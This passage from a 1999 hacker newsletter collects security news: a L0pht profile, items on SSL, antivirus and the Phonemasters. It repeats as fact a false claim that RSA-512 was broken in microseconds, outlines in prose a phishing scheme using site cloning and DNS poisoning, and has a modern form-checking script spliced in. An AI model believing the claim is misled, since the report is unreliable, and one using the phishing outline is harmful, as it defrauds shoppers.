Sixteen months ago, L0pht appeared before the Committee on Governmental Affairs of the United States Senate. Senator Fred Thompson introduced L0pht not as a "gang" nor even a "group," but, translating for Washington pols, as a "hacker think tank." L0pht wowed the committee by reeling off an alarming list of security holes in public and private systems. After the presentation, Senator Lieberman gushed, "It is probably not what you came to hear, but actually, I think you are performing an act of very good citizenship and I appreciate it." Lieberman went on to compare L0pht, in a single sentence, to both Rachel Carson and Paul Revere. "You are performing a valuable service to your country," Thompson added, "and we appreciate that and want you to continue." The National Security Council is equally bullish on L0pht. I met the N.S.C.'s director of information protection, Jeffrey Hunker, at Defcon, an annual three-day "conference" attracting more than 2,000 computer hackers from around the country. Hunker had come to talk about President Clinton's initiatives on computer security (and to spy on hackers, if you believe the whispers). He surprised me by raving about the group's technical sophistication. "L0pht has carved out an interesting niche for itself," he added, "and for similar-minded people — white-hatted hackers. Their objective is basically to help improve the state of the art in security and to be a gadfly, so to speak — to identify products that have vulnerabilities and make certain those vulnerabilities get fixed." When I told L0pht about Hunker's comments, they rolled their eyes, saying, "You're not going to publish that, are you?" For one thing, they had no wish to be identified as favorites of the N.S.C., since that might jeopardize their standing among so-called black-hat, or malicious, hackers. "We are all extremely ethical and moral," one member allowed, "but we're not white-hat hackers.
We have our own moral and ethical standards" — the term is gray-hat. It's not hard to spot the reasons for the moral ambiguity. In their off hours, Mudge and Dildog are members of Cult of the Dead Cow, a black-hat hacker group that recently released Back Orifice 2000 (bo2k), a computer program that enables a hacker to control another computer from afar. (The name is a crude play on Microsoft's Back Office Server, a program that allows a legitimate administrator to, among other things, control another computer on a network.) But unlike Back Office, bo2k is "invisible," meaning that a hacker can spy on another user, even change files, without the user's knowledge. Dildog, one of bo2k's authors, euphemistically describes it as "a shy program." Jason Garms, the former head of Microsoft's security-response team, is a bit more direct, labeling bo2k "a malicious program, with malicious intent." Perhaps because of their ties to the black-hat community, L0pht members refuse to be identified, although they will let themselves be photographed. As Space Rogue explains (and any hacker knows), pictures are next to useless if you're trying to dig up private data on someone. When L0pht testified before the Senate, members would not accept checks for hotel and travel expenses. As with members of the Witness Protection Program who have come before the Senate, they were reimbursed with cash. Senator John Glenn even signed pictures — with the group's screen names: "To Dr. Mudge. . . . To Space Rogue. . . . To Weld Pond."

"Open up the raincoat to expose all the little parts," is how Mudge, smiling, describes L0pht's ethos. Mudge will not disclose his age, but mid-30's seems a good guess. He claims a college degree in music with further course work in computer science. Mudge says that early experimenting with computers led to informal warnings from certain "three-letter agencies." He wears his hair below his shoulders, sports a goatee and favors faded jeans and a T-shirt.
In his Senate testimony he claimed to have given training seminars at NASA and the National Security Agency. Mudge frankly admits that he'll answer anyone's technical questions about hacking. "If a black hat approaches us and says, Hey, this is the project or problem I'm looking at . . . we'll talk to them, no problem. And if a government agency approaches us and says, How do you do this, or, How does this work, we'll talk to them."

Of course, this laissez-faire attitude has its costs. Mudge says: "Full disclosure is something we had to grapple with for a long time. The flip side is that critics say, 'You're giving people tools that can actually do bad things.' That is absolutely true. It's got a lot of nasty side effects."

For instance: last December, a hacker magazine called Phrack disclosed a flaw in a network program called Cold Fusion. (Network programs help manage computers that are linked together.) In April of this year, Weld Pond — an older, thoughtful L0pht programmer — discovered a second, more serious way to exploit the flaw. Weld immediately published an advisory on L0pht.com prescribing a fix. Weld's report also contained enough detail to explain the flaw to so-called "script kiddies" — young, malicious hackers with limited technical expertise who are among the most avid readers of L0pht's advisories. In the span of three weeks, according to PC Week, hackers inserted bogus text and images on at least 100 Cold Fusion systems, including those of NASA, the Army and the National Oceanic and Atmospheric Administration.

So why didn't L0pht contact Allaire, the small Cambridge, Mass., software firm that makes Cold Fusion, before releasing an advisory? The reason, say Weld and the other L0phties, is that vendors usually sweep tips from hackers under the rug. Vendors, claims L0pht, don't want customers to think software has flaws. "We were trained by the vendors to go public," says Mudge, "to give them a black eye."

With an attitude like this, it's tempting to blame Weld Pond, especially since L0pht's advisory led to more security breaches than would have occurred had nothing ever been reported. It's not enough to claim, as Weld does, that "We try to stay somewhat neutral — we're not on the vendor's side, we're not on the hacker's side. When we release the tools, they can be used for good or bad. It's up to the individuals to have morals."

Mudge is currently writing a paper on a longtime hobbyhorse of his: the vulnerability of electrical power grids to hacker attacks. While the computers that control these power grids are not directly connected to the Internet, Mudge thinks a hacker could still turn out the nation's lights because utility companies have left the keys to their computers under the proverbial doormat. Mudge tells me that careless utility employees often put internal documents on public servers — perhaps to access them from home or while on the road. Sometimes, Mudge claims, the documents explain how to access the central computers. Central computers "might have no attachment to the Internet," he says, "other than the fact that somebody put up a document on the Internet describing how to get to it and how to use it." Mudge pauses. "Well, that's just as good."

Mudge has written a program to scan utility companies' Web sites for words like "confidential" or "password." "I'm not breaking any laws by doing this, I'm just grabbing public stuff," he is quick to point out. "They don't realize that they're putting it up there for the world to see." He shows me a file downloaded from a large utility company that contains a presentation on company security. Next he opens a file full of phone numbers from another utility company. "It sounds almost science-fictionist," he cautions, "but with these numbers here I'd be able to turn off their entire grid." The phone numbers, he explains, connect to modems linked to the central switches that determine where electricity flows.

"If I don't publish this information," Mudge claims, "someone else will come along and do the same thing, with less ethical goals. Now you can see a situation where people are dying because of these corporations' stupidity. At that point, who's to blame?"

Given the stakes, Mudge intends to relax his commitment to so-called full disclosure. "It's uncool," he says, for utility companies to "learn about a problem by reading it in the newspaper." That's why he plans to alert companies in advance, so they can close vulnerabilities before the news is made public on L0pht's Web site.

Like Nader, the L0pht members can get a bit preachy on the subject of ethics. "Any of us could leave L0pht right now and take six-figure jobs," Mudge says. "The fact that we don't and we're on the ramen-noodle, mac-and-cheese diet, that speaks for our ethics right there. It's not a job for us; this is what drives us through life."

While Mudge's self-righteousness may be justified up to a point, there are also more prosaic reasons for working at L0pht. Freedom to do whatever you want, for instance. Silicosis and Brian Oblivion are installing a motor-driven satellite dish on the warehouse roof. They hope to capture ground-to-space communications from the Space Shuttle and high-resolution images of the earth broadcast from satellites. The justification? It's cool. Silicosis adds, "It impresses my girlfriend."

Space Rogue — a sort of young Archie Bunker figure, to the extent that an Archie Bunker figure can be young — sticks closer to earth when asked how he ended up at L0pht. "I did one semester in college, said the hell with this and got out. Controlled learning environments have never been my strong point." L0pht gave him a place to pursue projects at his own pace. Mostly, Space Rogue seems to like L0pht for the camaraderie. "I moved to Boston in 1990," he says, "and I almost immediately met all these people on line on local bulletin boards. L0pht started shortly thereafter in fall '91. So I'd already known these people awhile, even face to face. The on-line world at the time was very small."

Mudge recalls that the group took off when members moved their computers from their living rooms to a small loft space in Boston. (All but one of the founders, Brian Oblivion, have since left.) L0pht soon added members and moved to a larger suburban warehouse four years ago. It has also started a consulting business on the side called L0pht Heavy Industries.

L0pht is not without critics, of course. "While L0pht puts on the Robin Hood mantle of fighting the big computer companies," a senior programmer at Microsoft tells me, "their only victims are the little people that are customers" — the people who purchase products like Windows 2000. Microsoft has been on the business end of several L0pht advisories, most notably when Mudge and Weld demonstrated how to decrypt passwords from computers running Microsoft's NT operating system. Jason Garms, the former head of Microsoft's security-response team, admits that hackers have a role in creating secure software. But he's wary of the Darwinian notion that hackers will, by actively looking for flaws, expose inferior products. He likens it to improving public safety by painting a target on everyone's head.

I mentioned Garms's criticism to the L0pht members, who were equally dismissive. If gray-hat hackers stopped searching for vulnerabilities, L0pht believes, a black-hat hacker would find them sooner or later. It's better to get rid of flaws than hope no one finds them. The N.S.C.'s Hunker shares this belief — "the hackers are already out there" — which is why he applauds L0pht for keeping vendors honest. The senior Microsoft programmer also warns that Mudge and his colleagues, for all their highfalutin apologia, are motivated mostly by naked ego: "I am certain," he says, "that the primary motivation of these people is simple self-gratification and justification."

I asked the L0pht members whether ego played a part in their ethical reasoning. Weld Pond replied that, by assuming pseudonyms, they more or less deny themselves the benefits of celebrity. "When I walk down the street," he says, "no one knows I'm Weld Pond." But at Defcon, the annual hacker convention, it was quite clear that everyone knew Weld, Mudge, Space Rogue and Dildog. L0pht members have become, as Mudge notes wryly, "rock stars of the computer underground." That they help malicious hackers as well as the Feds and big business hasn't hurt their popularity among the outlaws.

On the other hand, L0pht's poorly hidden hunger for the spotlight shouldn't obscure the truly fascinating work they've done. Socially important research is perfectly compatible with, and perhaps inseparable from, love of celebrity, as James Watson has made admirably clear. Say what you will, there is no denying that L0pht's advisories have improved computer security even as they have harmed corporations and government agencies.

No one doubts that information security is going to become an increasingly critical topic as the ordinary economy moves into the digital age. In their grander moments, L0pht's members hope to become digital Ralph Naders, making sure that the software behind the transition is as safe as manufacturers say.

The idea of eight computer hackers in a dingy warehouse insuring the safety of the information age may sound a little farfetched. But sometimes hackers eventually direct their curiosity toward laudable ends. Take, for example, the two young hackers who engineered a small blue box in the early 1970's that allowed free long-distance calls when placed near a telephone receiver. The two enterprising techies went door to door in the Berkeley dorms, selling the devices. Their names? Steve Jobs and Steve Wozniak, future founders of Apple Computer.

Bruce Gottlieb was a staff writer at Slate magazine until enrolling in Harvard Law School this fall.
@HWA

45.0 NO SAFETY IN NUMBERS
~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Monday 4th October 1999 on 12:05 am CET

After an Israeli research institute said it could break Europe's banking codes in less than a second, an initiative has been launched that could result in unbreakable codes. The European Institute of Quantum Computing Network was founded a few weeks after news leaked from Israel's Weizmann Institute that it was using a mixture of quantum computing and special optical technology to break the RSA-512 code, the system used by the European banking system. It claims it has developed a hand-held device that can break the code in 12 microseconds.

The Sunday Times
http://www.sunday-times.co.uk/news/pages/tim/99/09/29/timintint02001.html?1341861

Europe's banking codes have been cracked in the blink of an eye

[Photo caption: End of the Enigma: Quantum Computing will spell the end of conventional encryption, such as the codes broken at Bletchley Park]

No safety in numbers
BEN HAMMERSLEY ben.hammersley@the-times.co.uk

After an Israeli research institute said it could break Europe's banking codes in less than a second, an initiative has been launched that could result in unbreakable codes. The European Institute of Quantum Computing Network was launched on Monday, to bring companies and research labs throughout Europe together in the hope that the new technology - Quantum Computing - can be taken from the theory to the high street.

The institute was founded a few weeks after news leaked from Israel's Weizmann Institute that it was using a mixture of quantum computing and special optical technology to break the RSA-512 code, the system used by the European banking system. It claims it has developed a hand-held device that can break the code in 12 microseconds.

Quantum computing works by taking advantage of the peculiar characteristics of subatomic particles. Whereas a normal computer relies on a signal - or bit - being either on or off, a quantum bit can be both on and off at the same time. This unusual ability means a great deal more information can be stored. While a regular computer works through each sum one at a time, a quantum computer can do every operation at the same time. This, the EIQC says, offers "not just incremental improvements, but a fundamental breakthrough" in computing power - enough for code-breaking, voice-recognition and translating computers to be simple to build.

The second aspect of Quantum computing, however, will help to make information more secure. Using a feature called "quantum entanglement", information could be sent between two computers that could not be eavesdropped upon without the two computers' knowledge. Because quantum physics dictates that monitoring a subatomic particle changes its state, not only would an eavesdropper announce his presence, but the message would be garbled. "A hacker wouldn't know where to start," says Jonathan Curtis of Quantum Electronic Devices.

As one member of EIQC, who wished to remain anonymous, predicts: "While quantum computers may be some time off, when they are available no communication will be secure unless it is quantum."

@HWA

46.0 YAHOO! MESSENGER DoS
~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by BHZ, Sunday 3rd October 1999 on 5:01 pm CET

A denial of service attack exists in build 733 of Yahoo! Messenger. The vulnerability exists when Messenger leaves port 5010 open. When a connection is made on port 5010, Messenger crashes. The connection stays open until the user closes the program. Team Asylum Security found the hole and informed Yahoo! of it. They have released build 734. Yahoo! Messenger (Build 734) still has port 5010 open but will not crash if connections are made to it.
http://www.team-asylum.com

@HWA

47.0 PROBLEM IN MFC40.DLL
~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by BHZ, Sunday 3rd October 1999 on 4:35 pm CET

Microsoft informs us of a problem in Mfc40.dll. An internal function within Mfc40.dll is designed to add 1900 to every 2-digit date that is passed to it. For example, 99 is returned as 1999. If more than 2 digits are passed, nothing is added. Programs that use this function may incorrectly parse a date after the year 2000. Solutions here.

http://support.microsoft.com/support/kb/articles/Q152/7/34.ASP

@HWA

48.0 US AIMS TO FIGHT ATTACKS ON FINANCIAL SYSTEMS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 3:45 pm CET

The U.S. Treasury Department on Friday opened a center intended to help the financial services industry and the government share information about cyber attacks and threats. The Financial Services Information Sharing and Analysis Center was formed following a directive from President Clinton that the Treasury Department work with the banking and finance sectors to find ways to improve security of information systems, according to a written statement issued Friday from the department. Read more

http://www.infoworld.com/cgi-bin/displayStory.pl?99101.entreasury.htm

U.S. aims to fight attacks on financial systems
By Nancy Weil
InfoWorld Electric
Posted at 12:00 PM PT, Oct 1, 1999

The U.S. Treasury Department on Friday opened a center intended to help the financial services industry and the government share information about cyber attacks and threats.

The Financial Services Information Sharing and Analysis Center was formed following a directive from President Clinton that the Treasury Department work with the banking and finance sectors to find ways to improve security of information systems, according to a written statement issued Friday from the department.

The center was officially announced by U.S. Treasury Secretary Lawrence Summers and is being supported by the U.S. Securities and Exchange Commission and the Federal Reserve Board. A dozen financial services companies have said they are interested in participating in the center, according to the statement.

"When I first joined the Treasury some years ago, I can assure you we were not thinking about threats to the financial system emanating from viruses, Trojan horses, logic bombs, or malicious code," Summers said in a prepared statement delivered when he announced the center Friday morning. "But we are thinking about those things now, and with good reason."

The pervasive use of the Internet by individuals and financial institutions has led to new needs when it comes to security, he said. A study last year by the Computer Security Institute found that among companies polled, 64 percent had information system security breaches, up 16 percent over 1997, he added. The total financial loss from the breaches rose 36 percent in a year.

"As damaging as these attacks have been, the vast majority has been conducted by disgruntled individuals," Summers said in his written remarks. "We face a future, though, where criminals, terrorists or even nation-states may use the same tools in a more organized way for darker purposes."

The new center, Summers said, "can play a key role in bolstering the confidence of the American public in the security and stability of our financial system" by enabling the financial industry and the government to share details about cyber attacks and how to quell them.

Additional information about the center had not been posted on the Treasury Department Web site as of Friday afternoon. The department, in Washington, can be reached at www.ustreas.gov.

Nancy Weil is a correspondent in the Boston bureau of the IDG News Service, an InfoWorld affiliate.
@HWA

49.0 DIGITALBOND ON SSL
~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 3:35 pm CET

SecurityPortal did an interview with Dale Peterson of DigitalBond, the company which last week went public with some of the major problems in SSL, showing that this isn't that secure either. The article also describes the actual workings of their attack on the Secure Sockets Layer system. Read it here.

http://securityportal.com/direct.cgi?/closet/closet19990930.html

Special Kurt's Closet: Is SSL dead?
Kurt Seifried, seifried@seifried.org, for http://www.securityportal.com/

September 30, 1999 - The title is a bit scary, but I wanted to get your attention (worked, didn't it?). Most security experts have been aware of problems with SSL, but generally speaking we haven't said much because there wasn't much of a replacement available for it, and it hasn't been exploited extensively (chances are it will be, though). I'll start with an explanation of the basic attack, followed by some methods to protect yourself, and finish with an interview with Dale Peterson of DigitalBond and the summary.

How to do it

Let's say I want to scam people's credit card numbers, and don't want to break into a server. What if I could get people to come to me, and voluntarily give me their credit card numbers? Well, this is entirely too easy. I would start by setting up a web server, and copying a popular site to it, say www.some-online-store.com; time required to do this with a tool such as wget is around 20-30 minutes. I would then modify the forms used to submit information and make sure they pointed to my server, so I now have a copy of www.some-online-store.com that looks and feels like the "real" thing. Now, how do I get people to come to it? Well, I simply poison their DNS caches with my information, so instead of www.some-online-store.com pointing to 1.2.3.4, I would point it to my server at 5.6.7.8. Now when people go to www.some-online-store.com they end up at my site, which looks just like the real one.

How to prevent being taken

Most forms online are not on secure servers, but the data you provide is usually sent to a secure server, which leads to one of the major problems. The form data may not be going where it should. A simple attack is to have the fake site, and a form that takes the data, without using a secure server at all. How many of you actively check the source HTML of pages you are plugging your credit card data into? The title bar should start with https:// followed by the sitename (i.e.: https://www.microsoft.com/). You should also examine the HTML source to make sure the form data points to where it should go; you should see something like:

or:

If a store is using the "GET" method, do not buy from them: any data you enter will be passed along as the query string, and if you look in the text of your address bar you will see your credit card info. If a store specifies a relative link (i.e.: /something/something.cgi) then make sure the current site you are at is a secure server, and that the certificate is legitimate. If the link is absolute, and points to an IP address, be suspicious; I personally would not buy if this were the case. Ideally the link should point to something like "https://www.some-online-store.com/cgi-bin/order.cgi", and you should first browse to that site, and make sure the certificate is legitimate, before hitting the submit button on your order form.

Most current SSL attacks are based on fooling the user, more so than breaking the technology. If you are vigilant, and check certificates before you submit to sites, you will be a little safer (but not completely). SSL certificates contain various pieces of information, such as who issued them, when it was issued, when it expires, who it was issued to and so forth. Who it was issued to (usually the "subject" field) and who issued it (the "issuer" field) are the two most important fields to check. To view the certificate details double click on the lock icon, usually at the bottom left of the screen in Netscape, and at the bottom right in Microsoft Internet Explorer.

Let's take https://www.microsoft.com/ for example. The Issuer field looks like:

OU = Secure Server Certification Authority
O = RSA Data Security, Inc.
C = US

The C stands for country, the O for organization (usually the company's name), and the OU stands for organizational unit (a division of the company). The subject field looks like:

CN = www.microsoft.com
OU = mscom
O = Microsoft
L = Redmond
S = Washington
C = US

The S stands for state, the L for locality (the city), and the CN is the certificate name (the site it applies to).
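The order-form and certificate checks described above, written out as an added example (this is not code from Kurt's article or from DigitalBond): it pulls the form tags out of a page's HTML source, classifies each submit target by the article's rules (GET, non-https, bare IP, relative vs. absolute action), and checks that a certificate's CN field exactly matches the host the form submits to. It assumes Node.js with the global URL class; the page URL, HTML and certificate fields are constructed samples.

```javascript
// Added example: apply the article's order-form and certificate checks to raw
// HTML. Assumes Node.js (global URL class). All URLs, HTML and certificate
// fields below are constructed samples, not real sites.

// Pull every <form> tag's action and method attributes out of the HTML source.
function extractForms(html) {
  const forms = [];
  const tagRe = /<form\b([^>]*)>/gi;
  const attrRe = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const attrs = {};
    let a;
    attrRe.lastIndex = 0;
    while ((a = attrRe.exec(tag[1])) !== null) {
      const value = a[2] !== undefined ? a[2] : (a[3] !== undefined ? a[3] : a[4]);
      attrs[a[1].toLowerCase()] = value;
    }
    // HTML defaults: empty action means the current page, method defaults to GET
    forms.push({ action: attrs.action || '', method: attrs.method || 'get' });
  }
  return forms;
}

const IPV4_RE = /^\d{1,3}(\.\d{1,3}){3}$/;

// Classify where one form would send its data, following the article's rules:
//   GET                 -> reject (card data ends up in the address bar)
//   not https           -> reject (sent in the clear)
//   bare IP target      -> suspicious
//   relative https      -> verify the certificate of the site you are on
//   absolute https      -> browse there first and verify that site's certificate
function classifyForm(pageUrl, form) {
  if (form.method.toLowerCase() === 'get') {
    return { verdict: 'reject', reason: 'GET passes the card number in the query string', host: null };
  }
  let target;
  try {
    target = new URL(form.action, pageUrl); // resolves a relative action against the page
  } catch (e) {
    return { verdict: 'reject', reason: 'unparseable form action', host: null };
  }
  if (target.protocol !== 'https:') {
    return { verdict: 'reject', reason: 'form data would not go to a secure server', host: target.hostname };
  }
  if (IPV4_RE.test(target.hostname) || target.hostname.startsWith('[')) {
    return { verdict: 'suspicious', reason: 'absolute action points at a bare IP address', host: target.hostname };
  }
  const isRelative = !/^[a-z][a-z0-9+.-]*:/i.test(form.action);
  return {
    verdict: 'verify-certificate',
    reason: isRelative
      ? 'relative action: check the certificate of the site you are on'
      : 'absolute action: browse to the target site first and check its certificate',
    host: target.hostname,
  };
}

// Parse a certificate Subject or Issuer block ("KEY = value" per line) into an object.
function parseDn(text) {
  const fields = {};
  for (const line of text.split('\n')) {
    const m = line.match(/^\s*([A-Za-z]+)\s*=\s*(.*?)\s*$/);
    if (m) fields[m[1].toUpperCase()] = m[2];
  }
  return fields;
}

// The CN must equal the host the form submits to, character for character: a
// look-alike such as miicrosoft.com can carry a valid certificate and still fail here.
function subjectMatchesHost(subjectText, host) {
  const cn = parseDn(subjectText).CN;
  return cn !== undefined && cn.toLowerCase() === host.toLowerCase();
}

// Constructed samples: an order page carrying three candidate forms.
const PAGE_URL = 'https://www.some-online-store.com/order.html';
const SAMPLE_HTML = `
<form method="post" action="https://www.some-online-store.com/cgi-bin/order.cgi">
<form method="get" action="/cgi-bin/order.cgi">
<form method="POST" action="https://5.6.7.8/cgi-bin/order.cgi">
`;
const SAMPLE_SUBJECT = [
  'CN = www.some-online-store.com', 'OU = sales', 'O = Some Online Store',
  'L = Boston', 'S = Massachusetts', 'C = US',
].join('\n');

// Run the checks over the samples and return the verdicts (also printed).
function demo() {
  const results = extractForms(SAMPLE_HTML).map((form) => classifyForm(PAGE_URL, form));
  results.forEach((r, i) => console.log(`form ${i + 1}: ${r.verdict} (${r.reason})`));
  console.log('subject CN matches store host:',
    subjectMatchesHost(SAMPLE_SUBJECT, 'www.some-online-store.com'));
  return results;
}

demo();
```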
Make sure all these are spelt correctly; many attackers will use domain names that look familiar (such as miicrosoft.com) in order to get legitimate certificates. Taking these precautions every time you use an SSL secured service is tedious, and underlines one of the major flaws with SSL, in that it is susceptible to "social engineering" attacks.

Another flaw in SSL is that it only secures the session; it doesn't secure any actual transaction. This means if someone does steal your credit card number and use it online, it is almost impossible to prove that it wasn't actually you that issued the order. SSL does allow for the client to authenticate to the server; however very few people have digital certificates compatible with this (I have one, and know of perhaps a half dozen other people, a definite minority). In addition to this the major certificate vendors have stopped issuing the personal certificates that guarantee the person's identity, so they are a dead end. There are newer protocols and systems that allow for two parties to safely conduct transactions with all these features.

The following is an interview with Dale Peterson of DigitalBond (www.digitalbond.com). DigitalBond is currently working on a product to secure Internet transactions, and is targeted at brokerage houses which have many thousands of users on a daily basis, making them an especially tempting target.

Kurt: Is SSL dead?

Dale: No. It is a fine session encryption protocol. The editor for the TLS (new name for latest version of SSL) spec works at Certicom and is our partner. I've talked this over with him, and he is very insistent that SSL is not broken. But he does say it suffers from all the problems we have discussed in these emails and could be augmented with a transaction protocol. I think that it certainly shouldn't be the protocol for most e-commerce transactions, but for the exchange of private data over the Internet it is ok.

Kurt: What do you envision replacing SSL?

Dale: We see a lot of businesses that are doing two-party transactions. Nice and simple, unlike the multi-party bank card model that SET addresses. We have developed a two-party transaction security model that we think meets the needs of Internet Brokerages, Internet prescription drugs, and other two-party transactions. It is being reviewed by Carnegie Mellon University, and they will publish a paper this year.

Kurt: Should we be educating users about these technologies? Do they care?

Dale: The most important education needed is that SSL transactions are not secure. The whole Internet community has been fed this baloney because SSL was around and easy. I have found it difficult getting reporters to even believe this vulnerability exists, even with a live demo. The response is "That can't be true. We would all know about this if that were true". That is why I think this story will be big when it breaks in the mainstream press.

Summary:

SSL is NOT dead. It is just an inappropriate security system for many Internet based transaction systems. As with many things on the Internet the growth of online sales, and especially the growth of online brokerages, has been stupendous. SSL was simply not designed with systems like these in mind, and systems like DigitalBond's are attempting to fix this. Chances are in 5 to 10 years that the existing systems will be found to be "weak", and replaced with better systems.

Kurt Seifried is a security analyst and the author of the "Linux Administrators Security Guide", a source of natural fiber and Linux security, part of a complete breakfast.
Related links:

http://www.digitalbond.com/
http://developer.netscape.com/tech/security/ssl/howitworks.html
http://developer.netscape.com/docs/manuals/security/sslin/index.htm

@HWA

50.0 THE FUTURE OF AV COMPANIES
~~~~~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 3:10 pm CET

Soon, every user will get free virus detection software over the Internet. So what does this future hold for anti-virus companies? "In the future it won't be about protecting computers against viruses, but content security", says security firm ICSA. But it's all about the updates, according to Symantec. Full story

http://www.zdnet.com/zdnn/stories/news/0,4586,2346360,00.html

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Virus protectors get a brand new bag
By Robert Lemos, ZDNN
October 1, 1999 4:18 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2346360,00.html

VANCOUVER, Canada -- Anti-virus software is quickly going the way of the browser -- soon to be free and ubiquitous, said industry insiders Friday at the Virus Bulletin99 conference.

Soon, every user will get free detection software, with security firms selling updates via the Internet at a monthly fee. Anti-virus services will also be sold to Internet Service Providers for resale to users.

"In the future it won't be about protecting computers against viruses, but content security," said Larry Bridwell, program technology manager for security firm International Computer Security Association. With the number of threats against computers increasing -- viruses, hackers, privacy-invading companies, and good old-fashioned bugs, to name a few -- keeping content safe and the computer running is now Job No.1.

Consumers' desire for a single fix-it package is changing the economics of the industry, admitted Carey Nachenberg, chief scientist for the Symantec Anti-virus Research Center. "We're all afraid the retail channel will dry up," he said.

Viruses with sneakers

An even more important factor: Viruses infecting computers via e-mail move far too quickly for companies to rely on manual updates to their software. Last spring, for example, the Melissa virus infected hundreds of thousands of computers within 48 hours.

"We're at a turning point right now," said Nachenberg in a keynote speech Thursday. "We need to re-examine our anti-virus software, and companies need to re-examine their anti-virus strategies."

Symantec (Nasdaq:SYMC) is taking a two-pronged approach to the problem. With partner IBM Corp. (NYSE:IBM), the anti-virus software maker is nearing completion of its "Digital Immune System." The technology automatically updates all subscribers over the Internet with virus recognition patterns whenever one of those computers encounters a new virus. Fixes for a new virus can be disseminated to all the machines on the network within as little as 30 minutes of encountering the first virus. The speed of the Internet, which viruses use to spread quickly, can now be used to get the cure out just as fast.

"As we distribute information faster and more broadly, we have to be careful," said Steve White, senior manager of IBM's Massively Distributed Systems Research Division, who helped design the new Digital Immune System service. "It becomes much easier to get viruses over the Internet."

Firewall for the home

Symantec is also preparing to package its anti-virus software into a single integrated security suite that will give home users a firewall, Internet filtering software and anti-virus utilities, said Symantec engineers at the show. The product will be released later this month.

But even that stand-alone product will eventually be connected to the Digital Immune System service, providing virus updates extremely quickly. "The whole industry is going toward automatic fixes and automatic updates," said IBM's White. "The anti-virus vendors are just adopting it faster."

Symantec's rivals are working on similar strategies. "A lot of the basis of value of a stand-alone product in the home is going away," said Craig Kensek, director of product marketing for anti-virus firm Trend Micro Inc. "For the non-technical home user, it's like insurance." Trend announced in September its new eDoctor strategy, which allows ISPs to protect their customers from viruses by scanning each file downloaded from the Internet. U S West (NYSE:USW) and Sprint Communications Corp. (NYSE:FON) have signed on to the service.

Virus reporting valuable

Rival security software firm Network Associates Inc. (Nasdaq:NETA) plans to release a similar technology to Symantec's, called the AutoImmune System, early next year, its engineers said.

While finding and fixing viruses faster has captured the interest of corporate network administrators, an automated system's ability to collect data on the number of virus incidents is equally valuable, said one administrator at the conference, who asked to remain anonymous.

Currently, the best source of such data is the Wildlist, and even that volunteer site would like to see better and more accurate statistics, said Sarah Gordon, one of the directors of the independently maintained Wildlist. "It would be extremely useful to get reports from these systems," she said. "We intend to pursue that in the future."
@HWA 51.0 UNPLUGGING THE "PHONEMASTERS" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Saturday 2nd October 1999 on 2:55 pm CET ZDNet has a story on the "ring of hackers" calling themselves the Phonemasters, who gained access to the telephone networks of companies as AT&T, British Telecom, MCI Worldcom etc and on how they were tracked and busted by FBI agents. http://www.zdnet.com/zdnn/stories/news/0,4586,2345639,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Unplugged! The biggest hack in history By John Simons, WSJ Interactive Edition October 1, 1999 8:54 AM PT URL: http://www.newslinx.com/ DALLAS -- In a federal courtroom here, Calvin Cantrell stands silently, broad shoulders slouched. His lawyer reads from a short letter he has written: "My parents taught me good ethics, but I have departed from some of these, lost my way sometimes," the letter states. "I was 25 and living at home. No job, and no future... . All I ever really wanted was to work with computers." Cantrell certainly did work with computers -- both his own, and, surreptitiously, those of some of the largest companies in the world. He was part of a ring of hackers that pleaded guilty here to the most extensive illegal breach of the nation's telecommunications infrastructure in high-tech history. And sitting behind him in court as he was sentenced two weeks ago was the accountant-turned-detective who caught him: Michael Morris. A decade earlier, Morris, bored with accounting work, left a $96,000 job at Price Waterhouse and enrolled in the FBI academy, at $24,500 a year. Cantrell's sentencing was the final act in a five-year drama for Morris, and secured his reputation as the FBI's leading computer gumshoe. 
The tale of Morris and Cantrell is among the first cops-and-robber stories of the New Economy, involving, among other things, the first-ever use of an FBI "data tap." It illustrates how the nation's law-enforcement agencies are scrambling to reinvent their profession in a frantic effort to keep pace with brilliant and restless young hackers. Unlimited potential for harm The story also shows that hacking's potential harm is far more ominous than theft of telephone credit-card numbers. Cantrell was part of an eleven-member group dubbed "The Phonemasters" by the FBI. They were all technically adept twentysomethings expert at manipulating computers that route telephone calls. The hackers had gained access to telephone networks of companies including AT&T Corp., British Telecommunications Inc., GTE Corp., MCI WorldCom (then MCI Communications Corp.), Southwestern Bell, and Sprint Corp. They broke into credit-reporting databases belonging to Equifax Inc. and TRW Inc. They entered Nexis/Lexis databases and systems of Dun & Bradstreet, court records show. The breadth of their monkey-wrenching was staggering; at various times, they could eavesdrop on phone calls, compromise secure databases, and redirect communications at will. They had access to portions of the national power grid, air-traffic-control systems and had hacked their way into a digital cache of unpublished telephone numbers at the White House. The FBI alleges, in evidence filed in U.S. District Court for the Northern District of Texas, that the Phonemasters had even conspired to break into the FBI's own National Crime Information Center. Unlike less-polished hackers, they often worked in stealth, and avoided bragging about their exploits. Their ultimate goal was not just fun, but profit. Some of the young men, says the FBI, were in the business of selling the credit reports, criminal records, and other data they pilfered from databases. 
